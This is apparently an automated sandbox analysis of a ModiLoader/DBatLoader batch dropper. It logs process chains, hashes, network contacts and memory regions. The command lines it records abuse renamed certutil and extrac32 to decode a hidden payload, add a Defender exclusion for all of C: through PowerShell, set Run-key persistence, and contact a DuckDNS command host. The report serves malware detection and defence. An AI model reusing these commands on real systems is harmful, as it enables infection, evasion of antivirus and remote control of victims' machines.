Analysis Overview
SHA256
6ff59a7a9bb26552d874bf03ffd04b7c152184e443d09f79a4f2459f8a04dd55
Threat Level: Known bad
The file hesaphareketi01.cmd was found to be: Known bad.
Malicious Activity Summary
ModiLoader, DBatLoader
ModiLoader Second Stage
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 10:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 10:46
Reported
2024-06-15 10:48
Platform
win7-20240508-en
Max time kernel
143s
Max time network
147s
Command Line
Signatures
ModiLoader, DBatLoader
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Audio.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\Audio.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\hesaphareketi01.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\hesaphareketi01.cmd" "C:\\Users\\Public\\Audio.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\hesaphareketi01.cmd" "C:\\Users\\Public\\Audio.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
C:\Users\Public\Libraries\Audio.pif
C:\Users\Public\Libraries\Audio.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
Files
C:\Users\Public\alpha.exe
| MD5 | 5746bd7e255dd6a8afa06f7c42c1ba41 |
| SHA1 | 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 |
| SHA256 | db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 |
| SHA512 | 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e |
C:\Users\Public\kn.exe
| MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 |
| SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 |
| SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 |
| SHA512 | 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2 |
C:\Users\Public\Audio.mp4
| MD5 | 2b394a65ee90021cb0990dbdb9ee43bb |
| SHA1 | 341e96b53dfb4831dfe1f3334cfb6405df173f52 |
| SHA256 | e106349c4b793aac809fd7b11dca2cf1a293fecd584071e9ed0b48cb0bdff857 |
| SHA512 | 51eae123e69dbf6d040d88f8984b9cdb8de16c0035f05a0c355c3f2d9b372706a7c8e6bf554051842980fb043328350d380c6590ac05cefb0996ddd9a9bd3680 |
C:\Users\Public\Libraries\Audio.pif
| MD5 | 1a7ed7270f975e1aedd73a800e17a40b |
| SHA1 | 6a7b00eb876108cbbcbeaef40448ecf34a518d59 |
| SHA256 | a6d0ab763d30f720839b50458cf1e4ab601f5574dd6d835aa17488535e89bd3b |
| SHA512 | 289ef44a7e171145232f497075596bdba81f53016a8d16935a20069396f91548e5643b1fab2264613f54cb34c12974529ab01fd6e5b3a78708557df2e00781f7 |
memory/2616-35-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-38-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-37-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-36-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-34-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-39-0x0000000000400000-0x0000000000589000-memory.dmp
memory/2616-41-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-40-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-43-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-42-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-44-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-46-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-49-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-48-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-47-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-50-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-53-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-56-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-55-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-57-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-54-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-59-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-62-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-63-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-61-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-60-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-65-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-89-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-81-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-75-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-131-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-128-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-125-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-121-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-119-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-116-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-112-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-109-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-105-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-102-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-99-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-96-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-92-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-86-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-82-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-79-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-76-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-74-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-71-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-67-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-66-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-64-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-80-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-78-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-77-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-73-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-72-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-70-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-69-0x00000000031A0000-0x00000000041A0000-memory.dmp
memory/2616-68-0x00000000031A0000-0x00000000041A0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-15 10:46
Reported
2024-06-15 10:48
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
ModiLoader, DBatLoader
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Audio.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows \System32\cmd.pif | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\cmd.pif | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mjhfyqrx = "C:\\Users\\Public\\Mjhfyqrx.url" | C:\Users\Public\Libraries\Audio.pif | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Audio.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Audio.pif | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hesaphareketi01.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\hesaphareketi01.cmd" "C:\\Users\\Public\\Audio.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\hesaphareketi01.cmd" "C:\\Users\\Public\\Audio.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
C:\Users\Public\Libraries\Audio.pif
C:\Users\Public\Libraries\Audio.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows "
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows \System32"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\\Windows \\System32\\cmd.pif"
C:\Windows \System32\cmd.pif
"C:\\Windows \\System32\\cmd.pif"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Mjhfyqrx.PIF
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.139.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 11.139.107.13.in-addr.arpa | udp |
| US | 13.107.139.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | w9vw9q.db.files.1drv.com | udp |
| US | 13.107.42.12:443 | w9vw9q.db.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 8.8.8.8:53 | kingmethod.duckdns.org | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.69.169.192.in-addr.arpa | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.duckdns.org | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 8.8.8.8:53 | kingmethod.sytes.net | udp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
| US | 192.169.69.26:7044 | kingmethod.duckdns.org | tcp |
Files
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\Audio.mp4
| MD5 | 2b394a65ee90021cb0990dbdb9ee43bb |
| SHA1 | 341e96b53dfb4831dfe1f3334cfb6405df173f52 |
| SHA256 | e106349c4b793aac809fd7b11dca2cf1a293fecd584071e9ed0b48cb0bdff857 |
| SHA512 | 51eae123e69dbf6d040d88f8984b9cdb8de16c0035f05a0c355c3f2d9b372706a7c8e6bf554051842980fb043328350d380c6590ac05cefb0996ddd9a9bd3680 |
C:\Users\Public\Libraries\Audio.pif
| MD5 | 1a7ed7270f975e1aedd73a800e17a40b |
| SHA1 | 6a7b00eb876108cbbcbeaef40448ecf34a518d59 |
| SHA256 | a6d0ab763d30f720839b50458cf1e4ab601f5574dd6d835aa17488535e89bd3b |
| SHA512 | 289ef44a7e171145232f497075596bdba81f53016a8d16935a20069396f91548e5643b1fab2264613f54cb34c12974529ab01fd6e5b3a78708557df2e00781f7 |
memory/4656-29-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-30-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-31-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-28-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-32-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-36-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-57-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-55-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-54-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-35-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-41-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-53-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-52-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-40-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-50-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-48-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-38-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-46-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-37-0x00000000029B0000-0x00000000039B0000-memory.dmp
memory/4656-43-0x00000000029B0000-0x00000000039B0000-memory.dmp
